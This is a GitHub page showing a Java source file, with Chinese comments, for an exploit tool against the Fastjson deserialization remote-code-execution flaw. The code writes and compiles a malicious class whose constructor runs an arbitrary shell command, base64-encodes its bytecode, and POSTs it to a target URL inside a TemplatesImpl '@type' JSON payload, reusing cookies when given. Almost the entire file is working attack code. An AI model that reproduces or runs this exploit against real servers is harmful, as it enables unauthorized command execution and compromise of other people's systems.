-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathfastjsonRce2017.java
More file actions
201 lines (181 loc) · 7.79 KB
/
fastjsonRce2017.java
File metadata and controls
201 lines (181 loc) · 7.79 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
import sun.misc.BASE64Encoder;
import javax.tools.JavaCompiler;
import javax.tools.JavaFileObject;
import javax.tools.StandardJavaFileManager;
import javax.tools.ToolProvider;
import java.io.*;
import java.lang.reflect.Array;
import java.net.URL;
import java.net.URLConnection;
import java.util.Arrays;
import java.util.Base64;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
@SuppressWarnings("all")
public class fastjsonRce2017 {
public static void payloadTest(String url,String cookies,String payload) {
PrintWriter out = null;
BufferedReader in = null;
URL realUrl;
URLConnection conn;
try {
if(cookies.equals("null")){
try{
URL accessUrl = new URL(url);
URLConnection connTest = accessUrl.openConnection();
Map<String,List<String>> headers = connTest.getHeaderFields();
List<String> setCookie = headers.get("Set-Cookie");
for(String str:setCookie){
System.out.println(str.substring(0,str.indexOf(";") + 1));
cookies += str.substring(0,str.indexOf(";") + 1) + " ";
}
}catch (Exception e){
e.printStackTrace();
System.out.println("Cookies Error : " + e);
}
}
realUrl = new URL(url);
conn = realUrl.openConnection();
//设置头部信息
conn.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36");
conn.setRequestProperty("Content-Type", "application/json");
conn.setRequestProperty("Cookie", cookies);
//发送POST请求必须的两行代码
conn.setDoOutput(true);
conn.setDoInput(true);
// 获取输出流
out = new PrintWriter(conn.getOutputStream());
//发送参数
String payloads = "{\"name\":{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""+
payload +
"\"],\"_name\":\"a.b\",\"_tfactory\":{ },\"_outputProperties\":{ },\"_version\":\"1.0\",\"allowedProtocols\":\"all\"},age:12}";
//System.out.println(payloads);
out.print(payloads);
//flush 输出流
out.flush();
//读取服务器返回的内容
in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
String line;
String resultContent = "";
while ((line = in.readLine()) != null) {
resultContent += line;
}
System.out.println(resultContent);
} catch (Exception e) {
//System.out.println("[+]发送 POST 请求出现异常!\n" + e);
System.out.println("[+] 测试成功");
System.out.println(e);
}
finally {
try{
if(out != null){
out.close();
}
if(in != null){
in.close();
}
}catch (IOException ex){
ex.printStackTrace();
System.out.println("输入输出流关闭异常:" + ex);
}
}
}
public static void paylaodFile(String cmd){
String paylaod = "" +
"import com.sun.org.apache.xalan.internal.xsltc.DOM;\n" +
"import com.sun.org.apache.xalan.internal.xsltc.TransletException;\n" +
"import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;\n" +
"import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;\n" +
"import com.sun.org.apache.xml.internal.serializer.SerializationHandler;\n" +
"import java.io.IOException;\n" +
"public class payload extends AbstractTranslet {\n" +
" public payload() throws IOException {\n" +
" Runtime.getRuntime().exec(\"" +
cmd + "\"" +
");\n" +
" }\n" +
" @Override\n" +
" public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {\n" +
" }\n" +
" @Override\n" +
" public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {\n" +
" }\n" +
" public static void main(String[] args) throws Exception {\n" +
" payload t = new payload();\n" +
" }\n" +
"}";
try{
File paylaodFs = new File("payload.java");
paylaodFs.createNewFile();
FileWriter fsWrite = new FileWriter(paylaodFs);
BufferedWriter out = new BufferedWriter(fsWrite);
out.write(paylaod);
out.flush(); //将内容写入文件
out.close();
fsWrite.close();
}catch (Exception e){
//no deal
e.printStackTrace();
}
}
public static void compilerPayload(){
System.out.println("[+] Compilering ... ...");
JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
StandardJavaFileManager fileManager = compiler.getStandardFileManager(null,null,null);
File file = new File("payload.java");
Iterable<? extends JavaFileObject> compilationUnits = fileManager.getJavaFileObjects(file);
JavaCompiler.CompilationTask task = compiler.getTask(null,fileManager,null,null,null,compilationUnits);
task.call();
System.out.println("[+] Compiler finish ... ...");
}
public static String base64Encode(){
File file = new File("payload.class");
long length = file.length();
//System.out.println("paylaod.calss size : " + length);
String payloadBase64 = "";
byte[] buffer = new byte[(int)length];
int len = 0;
int index = 0;
try{
InputStream input = new FileInputStream("payload.class");
while ((len = input.read()) != -1){
buffer[index] = (byte) len;
index++;
}
input.close(); //关闭文件流
}catch (Exception e){
System.out.println("[+] Read payload.class Error\n" + e);
e.printStackTrace();
}
BASE64Encoder encoder = new BASE64Encoder();
payloadBase64 = encoder.encode(buffer);
//System.out.print(payloadBase64);
//base64编码后有换行符导致payload无效,需要将其去掉
Pattern p = Pattern.compile("\\s*|\t|\r|\n");
Matcher m = p.matcher(payloadBase64);
payloadBase64 = m.replaceAll("");
return payloadBase64;
}
public static void main(String[] args){
System.out.println("" +
"【+】无Cookie情况下:\n" +
"e.g : fastjson-2018-Rce.jar http://attackServer/test/test/ null \"ping www.baidu.com\" \n" +
"【+】有Cookie情况下:\n" +
"e.g : fastjson-2018-Rce.jar http://attackServer/test/test/ cookies \"ping www.baidu.com\"");
String url = args[0];
String cookies = args[1];
String cmd = args[2];
paylaodFile(cmd);
compilerPayload();
String payload = base64Encode();
payloadTest(url,cookies,payload);
//删除payload.java文件
File tmp1 = new File("payload.java");
tmp1.delete();
//删除payload.class文件
File tmp2 = new File("payload.class");
tmp2.delete();
}
}